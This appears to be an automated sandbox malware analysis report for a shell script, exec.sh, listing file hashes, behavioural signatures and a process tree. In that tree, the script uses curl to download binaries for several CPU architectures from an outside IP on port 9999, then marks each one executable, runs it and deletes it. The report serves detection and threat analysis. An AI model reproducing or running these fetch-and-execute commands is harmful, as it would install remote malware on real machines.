Analysis
-
max time kernel
149s -
max time network
150s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240226-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
15-03-2024 20:08
Static task
static1
Behavioral task
behavioral1
Sample
exec.sh
Resource
ubuntu1804-amd64-20240226-en
Behavioral task
behavioral2
Sample
exec.sh
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
exec.sh
Resource
debian9-mipsbe-20240226-en
Behavioral task
behavioral4
Sample
exec.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
exec.sh
-
Size
842B
-
MD5
4eeac4436b9c68f85b1c3a2bae62d3f3
-
SHA1
4895bfd63ba3ae5fd97f69c4a243d4bae7eddfa1
-
SHA256
bfa195bd238473bfead86e74b796c4721d1f5281c284b96ff29d8806a82a6520
-
SHA512
e0091672dd843f9dd87b50f43c8b09711cd1b02c40a5a8e51a53878cdd213881328583e99d1d92aef5c497abdd3f181fe6f3a740aedb7d66918c05788bbd0e5b
Malware Config
Signatures
-
Executes dropped EXE 5 IoCs
Processes:
386_binaryamd64_binaryarm_binaryarm64_binarymips_binaryioc pid process /tmp/386_binary 772 386_binary /tmp/amd64_binary 807 amd64_binary /tmp/arm_binary 812 arm_binary /tmp/arm64_binary 817 arm64_binary /tmp/mips_binary 822 mips_binary -
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
mips_binarydescription ioc process File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size mips_binary -
Reads runtime system information 6 IoCs
Reads data from /proc virtual filesystem.
Processes:
curlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/mips64_binary curl File opened for modification /tmp/386_binary curl File opened for modification /tmp/amd64_binary curl File opened for modification /tmp/arm_binary curl File opened for modification /tmp/arm64_binary curl File opened for modification /tmp/mips_binary curl
Processes
-
/tmp/exec.sh/tmp/exec.sh1⤵
-
/usr/bin/curlcurl -o 386_binary http://5.10.249.153:9999/3862⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x 386_binary2⤵
-
/tmp/386_binary./386_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf 386_binary2⤵
-
/usr/bin/curlcurl -o amd64_binary http://5.10.249.153:9999/amd642⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x amd64_binary2⤵
-
/tmp/amd64_binary./amd64_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf amd64_binary2⤵
-
/usr/bin/curlcurl -o arm_binary http://5.10.249.153:9999/arm2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x arm_binary2⤵
-
/tmp/arm_binary./arm_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf arm_binary2⤵
-
/usr/bin/curlcurl -o arm64_binary http://5.10.249.153:9999/arm642⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x arm64_binary2⤵
-
/tmp/arm64_binary./arm64_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf arm64_binary2⤵
-
/usr/bin/curlcurl -o mips_binary http://5.10.249.153:9999/mips2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x mips_binary2⤵
-
/tmp/mips_binary./mips_binary2⤵
- Executes dropped EXE
- Enumerates kernel/hardware configuration
-
/bin/rmrm -rf mips_binary2⤵
-
/usr/bin/curlcurl -o mips64_binary http://5.10.249.153:9999/mips642⤵
- Reads runtime system information
- Writes file to tmp directory
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/386_binaryFilesize
16KB
MD58975168de4391197559b2f96e15fb056
SHA189ac1b3951d3ffdf5a86c518307645fcb3431228
SHA25621ce8bef4ef651429ab50a7e748b2c33f07c4c3e4e8dfbb26a6e638e1b00438d
SHA5120d177ab6ea136c6e945d51a5cc2c48af3c3dc29fcaf71ceeb47042b8aeef60164b6d4d9d1d4b85b56f345b4a6fea72043726d26765b1c509aeaafdfe09a6c820
-
/tmp/amd64_binaryFilesize
816KB
MD55ee7798fe4bb39b35ce9f710425ee4bb
SHA1330347669e995bdf51baeae79188eed75c8c60ba
SHA25602d52f896362869a3e885447857101742819d8fbc3ab478c6e9f4d7fc4805fc5
SHA512ea9dcc87ea28c18db5ba0a6d9ae8737961e260f8e67f8dcff8bda97a8c75a6d68ceefd13651e4435c65b380add0f6f3797e0f1150d3d6788796d8433178b91f1
-
/tmp/arm64_binaryFilesize
44KB
MD563b89e43233dcaa7366b7cb46ed7424c
SHA12108c75082c408738bb5ddfab07aae7db5e2fa50
SHA2563fcd72d0c272e41746c9ff31f29088e16a2ea7fd6259197907ec70720e1c8b4e
SHA512583f7414c8d1e5289925786a88861b50e92b70c5934d4a5faff1a41fde8e201f66e763bac300ed4cf062957c2ec46699f64b221fc92d925e24ba04be32821254
-
/tmp/arm_binaryFilesize
436KB
MD5ffb97d9ccd511fe0b32ff82b0d80e55e
SHA193ca73bff89bab2c9af14682126e50519a965b27
SHA2567beda89d1c7f88be91bdca69a0f1d7dfac4f9e936f23b53f9d1f25af34cce646
SHA5125858adfe5c356042a0624d0e67d4d1fff1c75b5dd36827f2720d4285f584dbd973fb760bbe09bf139e6da6088f9952d921c24b681388f523b511c4b4a154cbc3
-
/tmp/mips64_binaryFilesize
4KB
MD54cfbb8f1b2fcf8bf9b1d0c6b3912e27b
SHA1c55d9b1f14156d86a1c98b8063817b38d1f370f3
SHA256b384940943eddd69acd75088ca3b7c25fe0c921d6d233a0cdd89a3e02c405870
SHA512a616c20e1a9d5ec1670a1810967dcdd39fcf885075ca4ba9c34fce9c2ad205a4f22ccb8ae23778c468796c5fbc6192afbc5ff8f5dd8ad711763068519691d5a7
-
/tmp/mips_binaryFilesize
516KB
MD5ac7a872d0ed94926591bde3871f679de
SHA162b52e32c150cde4e167b251226f1ffa9ae01f74
SHA256d5afc60887de99b8158368d459938cdf40373724851884c7c37f4f1c6092e3ef
SHA5129b4f84ac869bb7f40721b28c2b3af5746def508038c15c431745df1c185213605b01148be66126b9f3c7f98e27681b0ba2b829f1f4595338a950de2673ff5b88